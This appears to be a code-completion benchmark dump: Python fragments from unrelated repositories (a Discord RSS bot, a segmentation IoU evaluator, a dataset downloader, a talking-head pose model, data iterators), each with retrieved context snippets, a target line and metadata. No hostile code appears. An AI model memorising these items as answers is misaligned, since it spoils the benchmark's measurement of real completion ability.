self.user_agent_rotator = UserAgent(
software_names=software_names,
operating_systems=operating_systems,
limit=1000
)
def concretize_response(self, response: dict):
if exists(response, "error") and response["error"]:
return response
del response["error"]
del response["error_code"]
if len(response["title"]) == 0:
del response["title"]
words = response["text"].split(" ")
if exists(response, "highlight") and len(response["highlight"]):
highlight_text = []
for span in response["highlight"]:
span = list(map(int, span))
selected_words = words[span[0]] if (
span[0] == span[1]
) else words[span[0]:span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
highlight_text.append(selected_words)
response["highlight"] = highlight_text
if exists(response, "matches") and len(response["matches"]):
matches_highlight = []
for match in response["matches"]:
matched_highlight_text = []
for match_span in match["highlight"]:
match_span = list(map(int, match_span))
selected_words = words[match_span[0]] if (
match_span[0] == match_span[1]
) else words[match_span[0]:match_span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
matched_highlight_text.append(selected_words)
matches_highlight.append({**match, "highlight": matched_highlight_text})
response["matches"] = matches_highlight
return response
def __request__(self, text: str, title: str = None):
return self.session.post(
API_URI,
headers={ | **HEADERS, | 2 | 2023-12-21 17:29:18+00:00 | 2k |
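The record keeps one `requests.Session` with an oversized connection pool and rotates the `User-Agent` per request before posting form data. The sketch below mirrors that setup; the URL is a placeholder and a small hard-coded agent list replaces the `random_user_agent` package used by the original.

```python
import random

import requests
from requests.adapters import HTTPAdapter

EXAMPLE_URL = "https://example.com/plagiarism-checker-send-data"  # placeholder endpoint
BASE_HEADERS = {
    "Accept": "*/*",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
}
USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

session = requests.Session()
session.mount("https://", HTTPAdapter(pool_connections=100, pool_maxsize=100))


def check_text(text: str, title: str = "") -> requests.Response:
    # Merge the static headers with a freshly chosen User-Agent for each request.
    headers = {**BASE_HEADERS, "User-Agent": random.choice(USER_AGENTS)}
    return session.post(EXAMPLE_URL, headers=headers, data={"text": text, "title": title})


# check_text("some essay text")  # left commented out: the URL above is only a placeholder
```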
fmhy/bot | cogs/rss.py | [
{
"identifier": "rss_chan_ids",
"path": "cogs/_config.py",
"snippet": "TOKEN = os.getenv(\"TOKEN\", None)\nGUILD_ID = os.getenv(\"GUILD_ID\", None)\nOWNERS = os.getenv(\"OWNERS\").split(\",\")\nRSS_CHANNELS = os.getenv(\"RSS_CHANNEL_IDS\", None)\nFEEDS = os.getenv(\"RSS_FEED_URLS\", None)\nDB = os.getenv(\"db_uri\")\n OWNERS: list[str]\n FEEDS: str\n RSS_CHANNELS: str\n TOKEN: str"
},
{
"identifier": "fetch_feed",
"path": "cogs/_helpers.py",
"snippet": "def fetch_feed():\n # Load the seen IDs from the file, or create an empty dictionary\n sent_articles = list(mycol.find().sort(\"_id\", -1))\n\n for rss_feed_url in rss_feed_urls:\n # Parse the RSS feed\n feed = feedparser.parse(rss_feed_url)\n\n # Check if the feed was parsed successfully\n if feed.bozo:\n print(f\"Error parsing RSS feed: {feed.bozo_exception}\")\n print(f\"{rss_feed_url}\")\n continue\n\n last_entry = feed.entries[0]\n\n x = list(mycol.find({\"link\": last_entry.link}))\n # print(x)\n\n if len(x) == 0:\n article_title = last_entry.title\n article_link = last_entry.link\n mycol.insert_one({\"link\": last_entry.link})\n\n # print(f\"New article: {article_title}\")\n # print(f\"Link: {article_link}\")\n\n yield f\"{EMOJI} | {article_title}\\n\\n{article_link}\"\n\n # print(f\"Parsing complete for {rss_feed_url}\")"
},
{
"identifier": "Bot",
"path": "main.py",
"snippet": "class Bot(commands.Bot):\n def __init__(self) -> None:\n self.start_time = datetime.datetime.now(datetime.UTC)\n intents = discord.Intents.all()\n\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n intents=intents,\n help_command=help.HelpMenu(),\n case_insensitive=True,\n )\n\n self.session: aiohttp.ClientSession\n formatter.install(\"discord\", \"INFO\")\n formatter.install(\"bot\", \"INFO\")\n self.logger = logging.getLogger(\"discord\")\n self.logger = logging.getLogger(\"bot\")\n\n async def setup_hook(self):\n await self.load_extension(\"jishaku\")\n await self.load_cogs()\n\n async def load_cogs(self):\n s = time.perf_counter()\n for file in os.listdir(\"cogs/\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n extension = f\"cogs.{file[:-3]}\"\n try:\n await self.load_extension(extension)\n self.logger.info(f\"Loaded - {extension}\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n self.logger.exception(\n f\"Failed to load extension {extension}. - {exception}\")\n traceback.print_exc()\n\n elapsed = time.perf_counter() - s\n self.logger.info(f\"Loaded all extensions - took {elapsed:.2f}s\")\n\n async def is_owner(self, user: discord.abc.User):\n if user.id in OWNERS:\n return True\n # Else fall back to the original\n return await super().is_owner(user)\n\n async def on_ready(self) -> None:\n self.session = aiohttp.ClientSession(loop=self.loop)\n await self.change_presence(activity=discord.Game(name=\"Free Media Heck Yeah\"))\n self.logger.info(\"Bot is ready!\")"
}
] | from typing import TYPE_CHECKING
from discord.ext import commands, tasks
from cogs._config import rss_chan_ids
from cogs._helpers import fetch_feed
from main import Bot
from discord.channel import TextChannel | 985 |
if TYPE_CHECKING:
class RSSFeeds(commands.Cog):
"""RSSFeeds commands"""
def __init__(self, bot: Bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
self.send_rss.start()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
@tasks.loop(seconds=300)
async def send_rss(self):
|
if TYPE_CHECKING:
class RSSFeeds(commands.Cog):
"""RSSFeeds commands"""
def __init__(self, bot: Bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
self.send_rss.start()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
@tasks.loop(seconds=300)
async def send_rss(self): | for msg in fetch_feed(): | 1 | 2023-12-19 10:27:04+00:00 | 2k |
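The completion iterates `fetch_feed()`, the helper that polls each RSS feed with feedparser and yields only unseen entries. Below is a trimmed version of that generator with an in-memory set in place of the MongoDB collection; the feed URL is a placeholder, not the bot's configured list.

```python
import feedparser

FEED_URLS = ["https://example.com/feed.xml"]  # placeholder
seen_links: set[str] = set()


def fetch_feed():
    for url in FEED_URLS:
        feed = feedparser.parse(url)
        if feed.bozo:                   # malformed or unreachable feed: skip it
            continue
        for entry in feed.entries[:1]:  # newest entry only, as in the original helper
            if entry.link not in seen_links:
                seen_links.add(entry.link)
                yield f"{entry.title}\n\n{entry.link}"


# for msg in fetch_feed():   # the record's completion iterates this generator
#     print(msg)
```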
cvlab-yonsei/RankMixup | calibrate/evaluation/segment_evaluator.py | [
{
"identifier": "DatasetEvaluator",
"path": "calibrate/evaluation/evaluator.py",
"snippet": "class DatasetEvaluator(metaclass=ABCMeta):\n \"\"\"\n Base class for a dataset evaluator\n \"\"\"\n @abstractmethod\n def reset(self):\n \"\"\"\n Preparation for a new round of evaluation.\n Should be called before starting a round of evaluation.\n \"\"\"\n pass\n\n @abstractmethod\n def update(self):\n \"\"\"\n Update status given a mini-batch results\n \"\"\"\n pass\n\n def curr_score(self):\n \"\"\"\n Return curr score after last batch\n \"\"\"\n pass\n\n @abstractmethod\n def mean_score(self):\n \"\"\"\n Return mean score across all classes/samples\n \"\"\"\n pass\n\n def class_score(self):\n \"\"\"\n Return score for different classes\n \"\"\"\n pass\n\n @abstractmethod\n def num_samples(self):\n \"\"\"\n return the evaluated samples\n \"\"\"\n pass\n\n @abstractmethod\n def main_metric(self):\n \"return the name of the main metric\"\n pass"
},
{
"identifier": "EPS",
"path": "calibrate/utils/constants.py",
"snippet": "EPS: float = 1e-10"
}
] | import logging
import numpy as np
import pandas as pd
import wandb
from terminaltables import AsciiTable
from typing import List, Optional
from .evaluator import DatasetEvaluator
from calibrate.utils.constants import EPS | 973 |
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_union = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_target = np.zeros((self.num_classes, ), dtype=np.float)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
|
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_union = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_target = np.zeros((self.num_classes, ), dtype=np.float)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
| iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS) | 1 | 2023-12-17 13:53:18+00:00 | 2k |
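The completion collapses the accumulated areas into a foreground IoU by skipping index 0 and guarding the division with `EPS`. The toy check below runs the same `intersect_and_union` bookkeeping on a four-pixel example with hand-verifiable numbers; it uses plain `float` arrays since `np.float`, which the record's code relies on, was removed in NumPy 1.24.

```python
import numpy as np

EPS = 1e-10
pred = np.array([0, 0, 1, 1])
label = np.array([0, 1, 1, 1])
num_classes, ignore_index = 2, 255

mask = label != ignore_index
pred, label = pred[mask], label[mask]
intersect = pred[pred == label]

area_inter, _ = np.histogram(intersect, bins=np.arange(num_classes + 1))  # [1, 2]
area_pred, _ = np.histogram(pred, bins=np.arange(num_classes + 1))        # [2, 2]
area_label, _ = np.histogram(label, bins=np.arange(num_classes + 1))      # [1, 3]
area_union = area_pred + area_label - area_inter                          # [2, 3]

print(area_inter / (area_union + EPS))                      # per-class IoU: [0.5, 0.667]
print(area_inter[1:].sum() / (area_union[1:].sum() + EPS))  # foreground IoU: 0.667
```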
CaptainCook4D/downloader | download_gopro_data.py | [
{
"identifier": "prepare_gopro_2d_output_directory",
"path": "util.py",
"snippet": "def prepare_gopro_2d_output_directory(args, output_dir: Path):\n\toutput_dir.mkdir(parents=True, exist_ok=True)\n\t\n\tdata_directory = output_dir / Constants.CAPTAIN_COOK_4D\n\tdata_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tgopro_data_directory = data_directory / Constants.GOPRO\n\tgopro_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tif args.resolution4K:\n\t\tresolution_4K_directory = gopro_data_directory / Constants.RESOLUTION_4K\n\t\tresolution_4K_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tresolution_360p_directory = gopro_data_directory / Constants.RESOLUTION_360P\n\tresolution_360p_directory.mkdir(parents=True, exist_ok=True)\n\t\n\treturn data_directory"
},
{
"identifier": "Constants",
"path": "util.py",
"snippet": "class Constants:\n\tCAPTAIN_COOK_4D = \"captain_cook_4d\"\n\t\n\tGOPRO = \"gopro\"\n\tHOLOLENS = \"hololens\"\n\tGOPRO_RESOLUTION_4K = \"gopro_4k\"\n\tGOPRO_RESOLUTION_360P = \"gopro_360p\"\n\t\n\tDATA_2D = \"data_2d\"\n\tRESOLUTION_360P = \"resolution_360p\"\n\tRESOLUTION_4K = \"resolution_4k\"\n\t\n\tRAW = \"raw\"\n\tSYNC = \"sync\"\n\t\n\tSPATIAL = \"spatial\"\n\t\n\tPV = \"pv\"\n\tMC = \"mc\"\n\t\n\tAB_ZIP = \"ab.zip\"\n\tDEPTH_ZIP = \"depth.zip\"\n\tFRAMES_ZIP = \"frames.zip\"\n\t\n\tDEPTH_AHAT = \"depth_ahat\"\n\tDEPTH = \"depth\"\n\tAB = \"ab\"\n\t\n\tDEPTH_POSE = \"depth_pose\"\n\tPV_POSE = \"pv_pose\"\n\tSPATIAL_POSE = \"spatial_pose\"\n\t\n\tIMU = \"imu\"\n\tDEPTH_POSE_PKL = \"depth_pose_pkl\"\n\tPV_POSE_PKL = \"pv_pose_pkl\"\n\tSPATIAL_POSE_PKL = \"spatial_pkl\"\n\t\n\tIMU_MAGNETOMETER = \"imu_magnetometer\"\n\tIMU_GYROSCOPE = \"imu_gyroscope\"\n\tIMU_ACCELEROMETER = \"imu_accelerometer\"\n\t\n\tIMU_ACCELEROMETER_PKL = \"imu_accelerometer_pkl\"\n\tIMU_GYROSCOPE_PKL = \"imu_gyroscope_pkl\"\n\tIMU_MAGNETOMETER_PKL = \"imu_magnetometer_pkl\"\n\t\n\tIS_HOLOLENS_ENABLED = \"is_hololens_enabled\"\n\tIS_SPATIAL_ENABLED = \"is_spatial_enabled\"\n\t\n\tDATA_JSON = \"data_json\"\n\t\n\tHOLOLENS_DEVICE_INFO = \"hololens_device_info\"\n\t\n\tRECORDING_ID = \"recording_id\"\n\tMETADATA = \"metadata\"\n\tDOWNLOAD_LINKS = \"download_links\"\n\tFILE_SIZES = \"file_sizes\"\n\tRECORDING = \"recording\"\n\t\n\tHOLOLENS_RAW_PV_FRAMES_ZIP = \"hololens_raw_pv_frames_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = \"hololens_raw_depth_ahat_ab_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = \"hololens_raw_depth_ahat_depth_zip\"\n\tHOLOLENS_RAW_MC_PKL = \"hololens_raw_mc_pkl\"\n\t\n\tHOLOLENS_SYNC_PV_FRAMES_ZIP = \"hololens_sync_pv_frames_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = \"hololens_sync_depth_ahat_ab_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = \"hololens_sync_depth_ahat_depth_zip\"\n\tHOLOLENS_SYNC_PV_VIDEO = \"hololens_sync_pv_video\"\n\t\n\tHOLOLENS_RAW_SPATIAL_PKL = \"hololens_raw_spatial_pkl\"\n\tHOLOLENS_RAW_IMU_MAGNETOMETER_PKL = \"hololens_raw_imu_magnetometer_pkl\"\n\tHOLOLENS_RAW_IMU_GYROSCOPE_PKL = \"hololens_raw_imu_gyroscope_pkl\"\n\tHOLOLENS_RAW_IMU_ACCELEROMETER_PKL = \"hololens_raw_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_SYNC_SPATIAL_PKL = \"hololens_sync_spatial_pkl\"\n\tHOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = \"hololens_sync_imu_magnetometer_pkl\"\n\tHOLOLENS_SYNC_IMU_GYROSCOPE_PKL = \"hololens_sync_imu_gyroscope_pkl\"\n\tHOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = \"hololens_sync_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_RAW_PV_POSE_PKL = \"hololens_raw_pv_pose_pkl\"\n\tHOLOLENS_SYNC_PV_POSE_PKL = \"hololens_sync_pv_pose_pkl\"\n\t\n\tHOLOLENS_RAW_DEPTH_POSE_PKL = \"hololens_raw_depth_pose_pkl\"\n\tHOLOLENS_SYNC_DEPTH_POSE_PKL = \"hololens_sync_depth_pose_pkl\"\n\t\n\tDURATION = \"duration\""
},
{
"identifier": "download_data",
"path": "util.py",
"snippet": "def download_data(download_url_links, download_file_paths):\n\t# ---- DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ----\n\twith ThreadPoolExecutor(max_workers=3) as executor:\n\t\tresults = list(\n\t\t\ttqdm(\n\t\t\t\texecutor.map(\n\t\t\t\t\tdownload_url,\n\t\t\t\t\tzip(download_url_links, download_file_paths)\n\t\t\t\t),\n\t\t\t\ttotal=len(download_url_links)\n\t\t\t)\n\t\t)\n\treturn results"
}
] | import argparse
import json
from pathlib import Path
from util import prepare_gopro_2d_output_directory, Constants, download_data | 1,527 |
def process_download_gopro_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
|
def process_download_gopro_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir) | data_directory = prepare_gopro_2d_output_directory(download_args, output_dir) | 0 | 2023-12-16 00:27:29+00:00 | 2k |
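The matching `download_data` helper in this record's context maps a worker over `zip(urls, paths)` with a three-thread pool, so each worker receives a single `(url, path)` tuple to unpack. The stdlib-only sketch below shows that wiring with a stubbed download step; the URLs and paths are placeholders.

```python
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path


def download_url(url_and_path: tuple[str, Path]) -> str:
    url, path = url_and_path
    # Real code would stream the response body to `path`; here we just record the plan.
    return f"{url} -> {path}"


urls = [f"https://example.com/file_{i}.zip" for i in range(3)]   # placeholders
paths = [Path("downloads") / f"file_{i}.zip" for i in range(3)]

with ThreadPoolExecutor(max_workers=3) as executor:              # matches the helper's cap
    for result in executor.map(download_url, zip(urls, paths)):
        print(result)
```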
mjavadpur/Sadtalker_LongVideos | src/audio2pose_models/audio2pose.py | [
{
"identifier": "CVAE",
"path": "src/audio2pose_models/cvae.py",
"snippet": "class CVAE(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n encoder_layer_sizes = cfg.MODEL.CVAE.ENCODER_LAYER_SIZES\n decoder_layer_sizes = cfg.MODEL.CVAE.DECODER_LAYER_SIZES\n latent_size = cfg.MODEL.CVAE.LATENT_SIZE\n num_classes = cfg.DATASET.NUM_CLASSES\n audio_emb_in_size = cfg.MODEL.CVAE.AUDIO_EMB_IN_SIZE\n audio_emb_out_size = cfg.MODEL.CVAE.AUDIO_EMB_OUT_SIZE\n seq_len = cfg.MODEL.CVAE.SEQ_LEN\n\n self.latent_size = latent_size\n\n self.encoder = ENCODER(encoder_layer_sizes, latent_size, num_classes,\n audio_emb_in_size, audio_emb_out_size, seq_len)\n self.decoder = DECODER(decoder_layer_sizes, latent_size, num_classes,\n audio_emb_in_size, audio_emb_out_size, seq_len)\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return mu + eps * std\n\n def forward(self, batch):\n batch = self.encoder(batch)\n mu = batch['mu']\n logvar = batch['logvar']\n z = self.reparameterize(mu, logvar)\n batch['z'] = z\n return self.decoder(batch)\n\n def test(self, batch):\n '''\n class_id = batch['class']\n z = torch.randn([class_id.size(0), self.latent_size]).to(class_id.device)\n batch['z'] = z\n '''\n return self.decoder(batch)"
},
{
"identifier": "PoseSequenceDiscriminator",
"path": "src/audio2pose_models/discriminator.py",
"snippet": "class PoseSequenceDiscriminator(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n leaky = self.cfg.MODEL.DISCRIMINATOR.LEAKY_RELU\n\n self.seq = nn.Sequential(\n ConvNormRelu('1d', cfg.MODEL.DISCRIMINATOR.INPUT_CHANNELS, 256, downsample=True, leaky=leaky), # B, 256, 64\n ConvNormRelu('1d', 256, 512, downsample=True, leaky=leaky), # B, 512, 32\n ConvNormRelu('1d', 512, 1024, kernel_size=3, stride=1, padding=1, leaky=leaky), # B, 1024, 16\n nn.Conv1d(1024, 1, kernel_size=3, stride=1, padding=1, bias=True) # B, 1, 16\n )\n\n def forward(self, x):\n x = x.reshape(x.size(0), x.size(1), -1).transpose(1, 2)\n x = self.seq(x)\n x = x.squeeze(1)\n return x"
},
{
"identifier": "AudioEncoder",
"path": "src/audio2pose_models/audio_encoder.py",
"snippet": "class AudioEncoder(nn.Module):\n def __init__(self, wav2lip_checkpoint, device):\n super(AudioEncoder, self).__init__()\n\n self.audio_encoder = nn.Sequential(\n Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(64, 128, kernel_size=3, stride=3, padding=1),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),\n Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(256, 512, kernel_size=3, stride=1, padding=0),\n Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)\n\n #### load the pre-trained audio_encoder, we do not need to load wav2lip model here.\n # wav2lip_state_dict = torch.load(wav2lip_checkpoint, map_location=torch.device(device))['state_dict']\n # state_dict = self.audio_encoder.state_dict()\n\n # for k,v in wav2lip_state_dict.items():\n # if 'audio_encoder' in k:\n # state_dict[k.replace('module.audio_encoder.', '')] = v\n # self.audio_encoder.load_state_dict(state_dict)\n\n\n def forward(self, audio_sequences):\n # audio_sequences = (B, T, 1, 80, 16)\n B = audio_sequences.size(0)\n\n audio_sequences = torch.cat([audio_sequences[:, i] for i in range(audio_sequences.size(1))], dim=0)\n\n audio_embedding = self.audio_encoder(audio_sequences) # B, 512, 1, 1\n dim = audio_embedding.shape[1]\n audio_embedding = audio_embedding.reshape((B, -1, dim, 1, 1))\n\n return audio_embedding.squeeze(-1).squeeze(-1) #B seq_len+1 512 "
}
] | import torch
from torch import nn
from src.audio2pose_models.cvae import CVAE
from src.audio2pose_models.discriminator import PoseSequenceDiscriminator
from src.audio2pose_models.audio_encoder import AudioEncoder | 1,566 |
class Audio2Pose(nn.Module):
def __init__(self, cfg, wav2lip_checkpoint, device='cuda'):
super().__init__()
self.cfg = cfg
self.seq_len = cfg.MODEL.CVAE.SEQ_LEN
self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE
self.device = device
self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device)
self.audio_encoder.eval()
for param in self.audio_encoder.parameters():
param.requires_grad = False
self.netG = CVAE(cfg)
|
class Audio2Pose(nn.Module):
def __init__(self, cfg, wav2lip_checkpoint, device='cuda'):
super().__init__()
self.cfg = cfg
self.seq_len = cfg.MODEL.CVAE.SEQ_LEN
self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE
self.device = device
self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device)
self.audio_encoder.eval()
for param in self.audio_encoder.parameters():
param.requires_grad = False
self.netG = CVAE(cfg) | self.netD_motion = PoseSequenceDiscriminator(cfg) | 1 | 2023-12-19 11:01:35+00:00 | 2k |
Angryrou/udao | udao/data/tests/iterators/dummy_udao_iterator.py | [
{
"identifier": "TabularContainer",
"path": "udao/data/containers/tabular_container.py",
"snippet": "class TabularContainer(BaseContainer):\n \"\"\"Container for tabular data, stored in DataFrame format.\"\"\"\n\n data: pd.DataFrame\n\n def get(self, key: str) -> np.ndarray:\n return self.data.loc[key].values # type: ignore"
},
{
"identifier": "UdaoIterator",
"path": "udao/data/iterators/base_iterator.py",
"snippet": "class UdaoIterator(BaseIterator[Tuple[UT, th.Tensor], UST], Generic[UT, UST]):\n \"\"\"Base iterator for the Udao use case, where the iterator\n returns a FeatureInput object. It is expected to accept:\n - a TabularContainer representing the tabular features\n which can be set as variables by the user in the optimization pipeline\n - a TabularContainer representing the objectives\n\n FST: Type of the iterator output shape - in the Udao case,\n restricted to FeatureInputShape and its subclasses.\n\n FT: Type of the iterator output - in the Udao case,\n restricted to th.Tensor and its subclasses\n This results in a type Tuple[UT, th.Tensor] for the iterator output.\n\n Parameters\n ----------\n keys : Sequence[str]\n Keys of the dataset, used for accessing all features\n tabular_features : TabularContainer\n Tabular features of the iterator\n objectives : TabularContainer\n Objectives of the iterator\n \"\"\"\n\n def __init__(\n self,\n keys: Sequence[str],\n tabular_features: TabularContainer,\n objectives: TabularContainer,\n ) -> None:\n super().__init__(keys)\n self.tabular_features = tabular_features\n self.objectives = objectives\n\n def get_tabular_features_container(\n self, feature_input: th.Tensor\n ) -> TabularContainer:\n indices = [\n i\n for i, name in enumerate(self.shape.feature_names)\n if name in self.tabular_features.data.columns\n ]\n tabular_features = feature_input[:, indices]\n tabular_df = pd.DataFrame(\n tabular_features.cpu().numpy(), columns=self.tabular_features.data.columns\n )\n return TabularContainer(tabular_df)"
},
{
"identifier": "UdaoEmbedInput",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoEmbedInput(Generic[T], UdaoInput):\n embedding_input: T\n\n def to(self, device: th.device) -> \"UdaoEmbedInput\":\n if hasattr(self.embedding_input, \"to\"):\n return UdaoEmbedInput(\n self.embedding_input.to(device), self.features.to(device) # type: ignore\n )\n else:\n return UdaoEmbedInput(\n self.embedding_input, self.features.to(device) # type: ignore\n )"
},
{
"identifier": "UdaoEmbedItemShape",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoEmbedItemShape(Generic[ST], UdaoItemShape):\n embedding_input_shape: ST"
},
{
"identifier": "UdaoInput",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoInput:\n features: th.Tensor\n\n def to(self, device: th.device) -> \"UdaoInput\":\n return UdaoInput(self.features.to(device))"
},
{
"identifier": "UdaoItemShape",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoItemShape:\n feature_names: list[str]\n output_names: list[str]"
}
] | from typing import Sequence, Tuple
from ....data.containers.tabular_container import TabularContainer
from ....data.iterators.base_iterator import UdaoIterator
from ....utils.interfaces import (
UdaoEmbedInput,
UdaoEmbedItemShape,
UdaoInput,
UdaoItemShape,
)
import torch as th | 1,099 |
class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]):
def __init__(
self,
keys: Sequence[str],
tabular_features: TabularContainer,
objectives: TabularContainer,
) -> None:
super().__init__(keys, tabular_features=tabular_features, objectives=objectives)
def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]:
key = self.keys[idx]
return (
UdaoInput(
th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype)
),
th.tensor(self.objectives.get(key), dtype=self.tensors_dtype),
)
@property
def shape(self) -> UdaoItemShape:
return UdaoItemShape(
feature_names=list(self.tabular_features.data.columns),
output_names=list(self.objectives.data.columns),
)
@staticmethod
def collate(
items: Sequence[Tuple[UdaoInput, th.Tensor]]
) -> Tuple[UdaoInput, th.Tensor]:
features = UdaoInput(th.vstack([item[0].features for item in items]))
objectives = th.vstack([item[1] for item in items])
return features, objectives
|
class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]):
def __init__(
self,
keys: Sequence[str],
tabular_features: TabularContainer,
objectives: TabularContainer,
) -> None:
super().__init__(keys, tabular_features=tabular_features, objectives=objectives)
def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]:
key = self.keys[idx]
return (
UdaoInput(
